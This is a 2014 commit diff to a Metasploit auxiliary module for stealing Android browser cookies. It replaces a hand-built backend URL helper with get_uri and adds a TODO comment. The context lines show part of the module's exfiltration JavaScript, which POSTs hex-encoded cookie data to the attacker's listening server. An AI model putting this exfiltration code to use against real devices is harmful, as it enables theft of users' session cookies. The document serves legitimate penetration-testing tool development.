Use get_uri instead, note lack of Rex::Text method

Tod Beardsley · Tod Beardsley · commit 123668495452 · 2014-12-28T15:06:34.000-06:00
See rapid7#4461
diff --git a/modules/auxiliary/gather/android_browser_new_tab_cookie_theft.rb b/modules/auxiliary/gather/android_browser_new_tab_cookie_theft.rb
@@ -110,7 +110,7 @@ def exfiltration_js
               return (c.length < 2) ? '0'+c : c;
             }).join('');
             var x2 = new XMLHttpRequest();
-            x2.open('POST', '#{backend_url}/');
+            x2.open('POST', '#{get_uri}/');
             x2.setRequestHeader('Content-type', 'text/plain');
             x2.send(hex);
           }
@@ -130,13 +130,7 @@ def cookie_path(file='')
     '/data/data/com.android.browser/databases/' + file
   end
 
-  def backend_url
-    proto = (datastore["SSL"] ? "https" : "http")
-    myhost = (datastore['SRVHOST'] == '0.0.0.0') ? Rex::Socket.source_address : datastore['SRVHOST']
-    port_str = (datastore['SRVPORT'].to_i == 80) ? '' : ":#{datastore['SRVPORT']}"
-    "#{proto}://#{myhost}#{port_str}/#{datastore['URIPATH'].gsub(/^\//, '')}"
-  end
-
+  # TODO: Make this a proper Rex::Text function
   def hex2bin(hex)
     hex.chars.each_slice(2).map(&:join).map { |c| c.to_i(16) }.map(&:chr).join
   end
